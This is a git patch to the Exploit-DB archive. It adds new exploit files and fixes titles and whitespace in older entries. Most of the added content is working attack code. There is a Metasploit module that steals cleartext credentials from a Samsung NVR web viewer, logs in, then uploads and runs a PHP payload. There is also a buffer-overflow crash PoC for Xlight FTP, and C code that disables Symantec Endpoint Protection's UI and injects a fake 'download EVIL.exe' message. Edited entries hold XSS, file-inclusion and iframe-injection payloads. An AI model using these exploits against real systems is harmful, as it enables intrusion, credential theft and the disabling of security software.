From 9e4de03a13c7a1edc5654f3e264511b262839f96 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 14 Nov 2017 05:01:29 +0000
Subject: [PATCH] DB: 2017-11-14

4 new exploits

Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)
Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass
IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation

IBM Websphere 6.0 - Faultactor Cross-Site Scripting
IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting

Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection
Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection

MemHT Portal 4.0.1 - SQL Injection Code Execution
MemHT Portal 4.0.1 - SQL Injection / Code Execution

AWCM 2.1 final - Remote File Inclusion
AWCM 2.1 Final - Remote File Inclusion

Invision Power Board 3 - search_app SQL Injection
Invision Power Board 3 - 'search_app' SQL Injection

PHP-Nuke 7.x - Content Filtering Byapss
PHP-Nuke 7.x - Content Filtering Bypass

Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload
---
 files.csv                           |  16 +-
 platforms/multiple/remote/28981.txt |   2 +-
 platforms/php/webapps/1317.py       |   2 +-
 platforms/php/webapps/15510.txt     |   5 +-
 platforms/php/webapps/15515.txt     |   2 +-
 platforms/php/webapps/26817.txt     |   4 +-
 platforms/php/webapps/38688.txt     |   4 +-
 platforms/php/webapps/43138.rb      | 249 +++++++++++++++++++++++++
 platforms/php/webapps/7114.txt      |   2 +-
 platforms/windows/dos/43135.py      |  38 ++++
 platforms/windows/local/43134.c     | 142 ++++++++++++++
 platforms/windows/local/43139.c     | 277 ++++++++++++++++++++++++++++
 12 files changed, 725 insertions(+), 18 deletions(-)
 create mode 100755 platforms/php/webapps/43138.rb
 create mode 100755 platforms/windows/dos/43135.py
 create mode 100755 platforms/windows/local/43134.c
 create mode 100755 platforms/windows/local/43139.c

diff --git a/files.csv b/files.csv
index 0c61c5bcc..d2ff02b9e 100644
--- a/files.csv
+++ b/files.csv
@@ -5729,6 +5729,7 @@ id,file,description,date,author,platform,type,port
 43119,platforms/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos,0
 43120,platforms/windows/dos/43120.txt,"Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos,0
 43124,platforms/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos,0
+43135,platforms/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9320,6 +9321,8 @@ id,file,description,date,author,platform,type,port
 43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0
 43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0
 43127,platforms/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",linux,local,0
+43134,platforms/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,windows,local,0
+43139,platforms/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation",2017-11-13,"Parvez Anwar",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -14168,7 +14171,7 @@ id,file,description,date,author,platform,type,port
 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0
 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow (Metasploit)",2013-10-15,Metasploit,windows,remote,0
 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)",2013-10-15,Metasploit,windows,remote,0
-28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0
+28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0
 28987,platforms/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,multiple,remote,0
 29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0
 29033,platforms/linux/remote/29033.html,"Links_ ELinks 'smbclient' - Remote Command Execution",2006-11-18,"Teemu Salmela",linux,remote,0
@@ -16779,7 +16782,7 @@ id,file,description,date,author,platform,type,port
 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps,0
 1312,platforms/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution",2005-11-10,rgod,php,webapps,0
 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0
-1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0
+1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0
 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0
 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps,0
 1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php?id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0
@@ -20770,7 +20773,7 @@ id,file,description,date,author,platform,type,port
 7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0
 7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0
 7113,platforms/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,php,webapps,0
-7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection Code Execution",2008-11-13,Ams,php,webapps,0
+7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection / Code Execution",2008-11-13,Ams,php,webapps,0
 7116,platforms/php/webapps/7116.txt,"Alstrasoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0
 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0
 7118,platforms/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps,0
@@ -24954,10 +24957,10 @@ id,file,description,date,author,platform,type,port
 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
 15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
 15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0
-15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0
+15510,platforms/php/webapps/15510.txt,"AWCM 2.1 Final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0
 15512,platforms/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0
 15513,platforms/php/webapps/15513.txt,"WordPress Plugin Event Registration 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0
-15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
+15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - 'search_app' SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
 15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0
 15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
 15518,platforms/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
@@ -29353,7 +29356,7 @@ id,file,description,date,author,platform,type,port
 26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
 26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0
 26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0
-26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0
+26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Bypass",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0
 26818,platforms/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,php,webapps,0
 26819,platforms/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,php,webapps,0
 26820,platforms/asp/webapps/26820.txt,"ASP-DEV XM Forum - 'forum.asp' Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps,0
@@ -38820,3 +38823,4 @@ id,file,description,date,author,platform,type,port
 43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0
 43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0
 43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090
+43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0
diff --git a/platforms/multiple/remote/28981.txt b/platforms/multiple/remote/28981.txt
index 161ce5d90..866a6bd6a 100755
--- a/platforms/multiple/remote/28981.txt
+++ b/platforms/multiple/remote/28981.txt
@@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the
 
 WebSphere Application Server 6 is vulnerable; other versions may also be affected.
 
-GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1
\ No newline at end of file
+GET /<SCRIPT>alert('Can%20Cross%20Site%20Attack')</SCRIPT> HTTP/1.1        
\ No newline at end of file
diff --git a/platforms/php/webapps/1317.py b/platforms/php/webapps/1317.py
index 00a0f67bc..adce96a7c 100755
--- a/platforms/php/webapps/1317.py
+++ b/platforms/php/webapps/1317.py
@@ -62,4 +62,4 @@ passwd=conf[:conf.find("'")]
 print '[+]Exploit Succeed'
 print '[+]User :', user, 'Pass :', passwd
 
-# milw0rm.com [2005-11-13]
\ No newline at end of file
+# milw0rm.com [2005-11-13]        
\ No newline at end of file
diff --git a/platforms/php/webapps/15510.txt b/platforms/php/webapps/15510.txt
index 8918da984..fb04d9c06 100755
--- a/platforms/php/webapps/15510.txt
+++ b/platforms/php/webapps/15510.txt
@@ -12,7 +12,4 @@ http://sourceforge.net/projects/awcm/files/
 [+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] 
 
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-Greetings:  No Greet  !_!
-
-
-      
\ No newline at end of file
+Greetings:  No Greet  !_!        
\ No newline at end of file
diff --git a/platforms/php/webapps/15515.txt b/platforms/php/webapps/15515.txt
index 5f08bfc00..28e5708ca 100755
--- a/platforms/php/webapps/15515.txt
+++ b/platforms/php/webapps/15515.txt
@@ -9,4 +9,4 @@
 The vulnerability is in the file search.php, the variable search_app is vulnerable.An attacker can exploit this to find out the rootpath of website or for Blind SQLi attack.
 
 -Google Dork: inurl:index.php?app=core 
--Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]= 		 	   		  
\ No newline at end of file
+-Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]=        
\ No newline at end of file
diff --git a/platforms/php/webapps/26817.txt b/platforms/php/webapps/26817.txt
index 35f65deb1..23fbf77f9 100755
--- a/platforms/php/webapps/26817.txt
+++ b/platforms/php/webapps/26817.txt
@@ -1,4 +1,4 @@
-source: http://www.securityfocus.com/bid/15855/info
+            source: http://www.securityfocus.com/bid/15855/info
 
 PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks.
 
@@ -12,4 +12,4 @@ Insert:
 URI:
 http://www.example.com/[DIR]//modules.php?name=Web_Links
 Insert:
-<iframe src=http://www.example.com?phpnuke79 < 
\ No newline at end of file
+<iframe src=http://www.example.com?phpnuke79 <        
\ No newline at end of file
diff --git a/platforms/php/webapps/38688.txt b/platforms/php/webapps/38688.txt
index 7c27bca4b..4262dd49c 100755
--- a/platforms/php/webapps/38688.txt
+++ b/platforms/php/webapps/38688.txt
@@ -1,4 +1,4 @@
-[+] Credits: hyp3rlinx
+            [+] Credits: hyp3rlinx
 
 [+] Website: hyp3rlinx.altervista.org
 
@@ -151,4 +151,4 @@ The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 
-by hyp3rlinx
\ No newline at end of file
+by hyp3rlinx        
\ No newline at end of file
diff --git a/platforms/php/webapps/43138.rb b/platforms/php/webapps/43138.rb
new file mode 100755
index 000000000..1a37fe626
--- /dev/null
+++ b/platforms/php/webapps/43138.rb
@@ -0,0 +1,249 @@
+# Exploit Title: Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D
+# Date: 2017-06-19
+# Exploit Author: Omar MEZRAG - 0xFFFFFF / www.realistic-security.com
+# Vendor Homepage: https://www.hanwhasecurity.com
+# Version: Web Viewer 1.0.0.193 on Samsung SRN-1670D
+# Tested on: Web Viewer 1.0.0.193 
+# CVE : CVE-2017-16524
+##
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'digest'
+
+class MetasploitModule < Msf::Exploit::Remote
+  	
+  	Rank = GoodRanking
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::PhpEXE
+
+	def initialize(info = {})
+	    super(update_info(info,
+	      'Name'           => 'Samsung SRN-1670D - Web Viewer Version 1.0.0.193 Arbitrary File Read & Upload',
+	      'Description'    => %q{
+		This module exploits an Unrestricted file upload vulnerability in 
+		Web Viewer 1.0.0.193 on Samsung SRN-1670D devices: 'network_ssl_upload.php' 
+		allows remote authenticated attackers to upload and execute arbitrary
+		PHP code via a filename with a .php extension, which is then accessed via a
+		direct request to the file in the upload/ directory. 
+		To authenticate for this attack, one can obtain web-interface credentials 
+		in cleartext by leveraging the existing Local File Read Vulnerability 
+		referenced as CVE-2015-8279, which allows remote attackers to read the 
+		web interface credentials via a request for the
+		cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.
+	      },
+
+	      'Author'         => [
+		'Omar Mezrag <omar.mezrag@realistic-security.com>',  # @_0xFFFFFF
+	        'Realistic Security',
+	        'Algeria'
+	       ],
+	      'License'        => MSF_LICENSE,
+	      'References'     =>
+	        [
+	          [ 'CVE', '2017-16524' ],
+	          [ 'URL', 'https://github.com/realistic-security/CVE-2017-16524' ],
+	          [ 'CVE', '2015-8279' ],
+	          [ 'URL', 'http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html' ]
+	        ],
+	      'Privileged'     => true,
+	      'Arch'           => ARCH_PHP,
+	      'Platform'       => 'php',
+	      'Targets'        =>
+	        [
+			['Samsung SRN-1670D == 1.0.0.193', {}]
+	        ],
+	      'DefaultTarget'  => 0,
+	      'DisclosureDate' => 'Mar 14 2017'
+	    ))
+
+	    register_options(
+	      [
+	        OptString.new('RHOST', [ true, 'The target address.' ]),
+		OptString.new('RPORT', [ true, 'The target port (TCP).', '80' ]),
+	      ])
+	end
+
+
+	def check
+		#
+		print_status('Checking version...') 
+
+	 	resp = send_request_cgi({
+			'uri'     =>  "/index",
+			'version' => '1.1',
+			'method' => 'GET',
+			'headers' =>
+				{
+				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
+				}
+	        })
+	    
+		unless resp
+			print_error("Connection timed out.")
+			return Exploit::CheckCode::Unknown
+		end
+		#        <!---------------------------------   File Version 1.0.0.193   --------------------------------->
+		version = nil
+		if resp and resp.code == 200  and resp.body.match(/Web Viewer for Samsung NVR/)
+				if resp.body =~ /File Version (\d+\.\d+\.\d+\.\d+)/
+					version = $1
+					if version == '1.0.0.193'
+						print_good "Found vesrion: #{version}"
+						return Exploit::CheckCode::Appears
+					end
+				end
+		end
+
+		Exploit::CheckCode::Safe
+
+	end
+
+  	def exploit
+
+	 
+		print_status('Obtaining credentails...') 
+	 
+	 	resp = send_request_cgi({
+			'uri'     =>  "/cslog_export.php",
+			'version' => '1.1',
+			'method' => 'GET',
+			'vars_get'=>
+				{
+				'path' => '/root/php_modules/lighttpd/sbin/userpw',
+				'file' => 'foo'
+				},
+			'headers' =>
+				{
+				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
+				}
+	        })
+		
+		unless resp
+			print_error("Connection timed out.")
+			return Exploit::CheckCode::Unknown
+		end
+
+		if resp and resp.code == 200 and resp.body !~ /Authentication is failed/ and resp.body !~ /File not found/
+			username =  resp.body.split(':')[0]
+			password =  resp.body.split(':')[1].gsub("\n",'')
+			print_good "Credentials obtained successfully: #{username}:#{password}"
+				
+
+				data1 = Rex::Text.encode_base64("#{username}")
+				data2 = Digest::SHA256.hexdigest("#{password}")
+
+				randfloat  = Random.new
+				data3 =  randfloat.rand(0.9)
+				data4 = data3
+
+				print_status('Logging...') 
+
+			 	resp = send_request_cgi({
+					'uri'     =>  "/login",
+					'version' => '1.1',
+					'method' => 'POST',
+					'vars_post'=>
+						{
+							'data1' => data1,
+							'data2' => data2,
+							'data3' => data3,
+							'data4' => data4
+						},
+					'headers' =>
+						{
+						   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
+						   'DNT' => "1",
+						   'Cookie' => "IESEVEN=1"
+						}
+				})
+
+				unless resp
+					print_error("Connection timed out.")
+					return Exploit::CheckCode::Unknown
+				end
+				
+				if resp and resp.code == 200  and resp.body !~ /ID incorrecte/  and resp.body =~ /setCookie\('NVR_DATA1/
+
+					print_good('Authentication Succeeded') 
+
+					nvr_d1 = $1 if resp.body =~ /setCookie\('NVR_DATA1', '(\d\.\d+)'/
+					nvr_d2 = $1 if resp.body =~ /setCookie\('NVR_DATA2', '(\d+)'/
+					nvr_d3 = $1 if resp.body =~ /setCookie\('NVR_DATA3', '(0x\h\h)'/
+					nvr_d4 = $1 if resp.body =~ /setCookie\('NVR_DATA4', '(0x\h\h)'/
+					nvr_d7 = $1 if resp.body =~ /setCookie\('NVR_DATA7', '(\d)'/
+					nvr_d8 = $1 if resp.body =~ /setCookie\('NVR_DATA8', '(\d)'/
+					nvr_d9 = $1 if resp.body =~ /setCookie\('NVR_DATA9', '(0x\h\h)'/
+
+					cookie = "IESEVEN=1; NVR_DATA1=#{nvr_d1}; NVR_DATA2=#{nvr_d2}; NVR_DATA3=#{nvr_d3}; NVR_DATA4=#{nvr_d4}; NVR_DATA7=#{nvr_d7}; NVR_DATA8=#{nvr_d8}; NVR_DATA9=#{nvr_d9}"
+
+					payload_name = "#{rand_text_alpha(8)}.php"
+
+					print_status("Generating payload[ #{payload_name} ]...") 
+
+					php_payload = get_write_exec_payload(:unlink_self=>true)
+				
+					print_status('Uploading payload...') 
+
+					data = Rex::MIME::Message.new
+					data.add_part("2", nil, nil, 'form-data; name="is_apply"')
+					data.add_part("1", nil, nil, 'form-data; name="isInstall"')
+					data.add_part("0", nil, nil, 'form-data; name="isCertFlag"')
+					data.add_part(php_payload, 'application/x-httpd-php', nil, "form-data; name=\"attachFile\"; filename=\"#{payload_name}\"")
+					post_data = data.to_s
+
+					resp = send_request_cgi({
+
+						'uri'      => normalize_uri('/network_ssl_upload.php'),
+						'method'   => 'POST',
+						'vars_get' => 
+							{
+							'lang' => 'en'
+							},
+						'headers' =>
+							{
+							   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
+							},
+						'ctype'    => "multipart/form-data; boundary=#{data.bound}",
+						'cookie'   => cookie,
+						'data'     => post_data
+
+					    })
+
+					unless resp
+						print_error("Connection timed out.")
+						return Exploit::CheckCode::Unknown
+					end
+
+					if resp and resp.code == 200 
+						print_status('Executing payload...') 
+						upload_uri = normalize_uri("/upload/" + payload_name)
+						send_request_cgi({
+							'uri'    => upload_uri,
+							'method' => 'GET'
+						},5)
+
+						unless resp
+							print_error("Connection timed out.")
+							return Exploit::CheckCode::Unknown
+						end
+
+						if resp and resp.code != 200
+							print_error("Failed to upload")
+						end
+
+					else
+						print_error("Failed to upload")
+					end
+				else
+					print_error("Authentication failed")
+				end
+			
+		else
+			print_error "Error obtaining credentails"
+		end
+	end
+end        
\ No newline at end of file
diff --git a/platforms/php/webapps/7114.txt b/platforms/php/webapps/7114.txt
index a553c7fa3..66068c2dc 100755
--- a/platforms/php/webapps/7114.txt
+++ b/platforms/php/webapps/7114.txt
@@ -152,4 +152,4 @@ sub usage {
 	exit;
 }
 
-# milw0rm.com [2008-11-13]
\ No newline at end of file
+# milw0rm.com [2008-11-13]        
\ No newline at end of file
diff --git a/platforms/windows/dos/43135.py b/platforms/windows/dos/43135.py
new file mode 100755
index 000000000..1ce425f47
--- /dev/null
+++ b/platforms/windows/dos/43135.py
@@ -0,0 +1,38 @@
+#!/usr/bin/python
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: Xlight FTP Server (x86/x64) - Buffer Overflow Crash (PoC)
+# Date: 07-11-2017
+# Vulnerable Software: Xlight FTP Server v3.8.8.5 (x86/x64)
+# Vendor Homepage: http://www.xlightftpd.com/
+# Version: v3.8.8.5 (x86/x64)
+# Software Link: http://www.xlightftpd.com/download/
+# Tested On: Windows 7 x64
+#
+#
+# PoC: generate crash.txt, copy contents to clipboard, paste in any of the vulnerable fields
+#
+# 1. Generate crash.txt, open, and copy contents to clipboard
+# 2. In Xlight Server, open Global Options > Log > Session Log - Advanced Options > Setup
+# 3. Select Filtering log by users > Setup 
+# 4. Add User
+# 5. Paste crash.txt contents
+# 6. Application crashes
+#
+# Additional vulnerable fields:
+# Global Options > Log > Session Log - Advanced Options > Setup > Filtering log by groups > Setup > Add Group
+# Virtual Server > Modify Virtual Server Configuration > Advanced > Misc > Execute a program after user logged in > Setup
+#
+#
+  
+file="crash.txt"
+#file="crash64.txt"
+
+crash = "A"*260  		#crashes on 260 for x86, but more will do
+#crash64 = "A"*272		#crashes on 272 for x64, but more will do
+ 
+writeFile = open (file, "w")
+writeFile.write( crash )
+#writeFile.write( crash64 )
+writeFile.close()        
\ No newline at end of file
diff --git a/platforms/windows/local/43134.c b/platforms/windows/local/43134.c
new file mode 100755
index 000000000..b07306470
--- /dev/null
+++ b/platforms/windows/local/43134.c
@@ -0,0 +1,142 @@
+                                                                        [+] Credits: John Page a.k.a hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+=======
+www.symantec.com
+
+
+
+Product:
+===========
+Symantec Endpoint Protection
+v12.1.6 (12.1 RU6 MP5) 
+Symantec 12.1.7004.6500 
+
+
+
+Vulnerability Type:
+===================
+Tamper-Protection Bypass
+Denial Of Service / Message Spoof
+
+
+
+CVE Reference:
+==============
+CVE-2017-6331
+SSG16-041
+
+
+
+Security Issue:
+================
+Symantec Endpoint Protection (SEP), does not validate where WinAPI messages comes from (lack of UIPI).
+Therefore, malware can easily spoof messages to the UI or send WM_SYSCOMMAND to close
+the SEP UI denying end user ability to scan / run the EP AntiVirus protection. Spoofed messages could
+also potentially inform a user a scan was clean.
+
+Unfortunately Symantecs advisory left out details of the Denial Of Service as well as minimizing the
+amount of text a malware could inject into the UI which would result in compromising the integrity of the
+Symantec Endpoint Protection Control Panel user interface. 
+
+
+References:
+===========
+https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20171106_00
+ 
+
+
+Exploit/POC:
+============= 
+
+1) Compile below C program, it targets various components of SEP, comment out what you want to send to the UI.
+
+2) Try to open the Symantec Endpoint UI and you will be denied.
+3) Or inject attacker supplied messages intructing the user the file is clean etc.
+
+
+#include <windows.h>
+#include <Tlhelp32.h>
+#define VICTIM "DevViewer.exe"
+
+//By HYP3RLINX
+//ISR: ApparitionSec
+//Symantec EP Protection - Tamper Protection Bypass Vulnerability
+//Tested successfully on Symantec 12.1.6 (12.1 RU6 MP5) build 7004 Symantec 12.1.7004.6500 Windows 7 
+//How: FindWindow / SendMessage Win32 API 
+//Impact: DOS / Integrity Compromised
+//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.
+
+void main(void){
+ 
+   while(1){
+            
+   HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
+   
+   if(hWnd!=NULL){
+     //This injects arbitrary messages to SEP UI.
+     SetWindowText(hWnd, "*** Important Security Update, Visit: http://PWN3D.com/EVIL.exe download and follow instructions. ***");
+     //This prevents a user from being able to run AV scans and renders SEP UI useless
+    //SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);   
+   }  
+   
+   //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
+   
+   HWND x = FindWindow(NULL, TEXT("DevViewer"));
+   if(x!=NULL){
+     SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);   
+  }
+  
+   HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
+   SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0); 
+
+   HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
+   SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);  
+   
+  HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
+   if(x!=NULL){
+     SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);   
+  }
+  
+   sleep(1);
+   
+   }  
+}
+
+
+Network Access:
+===============
+Local
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: July 8, 2016
+Vendor acknowledged: 7/14/16
+Vendor advisory : November 6, 2017
+November 10, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx        
\ No newline at end of file
diff --git a/platforms/windows/local/43139.c b/platforms/windows/local/43139.c
new file mode 100755
index 000000000..71d8cae93
--- /dev/null
+++ b/platforms/windows/local/43139.c
@@ -0,0 +1,277 @@
+                        /*
+
+Exploit Title    - IKARUS anti.virus Arbitrary Write Privilege Escalation
+Date             - 13th November 2017
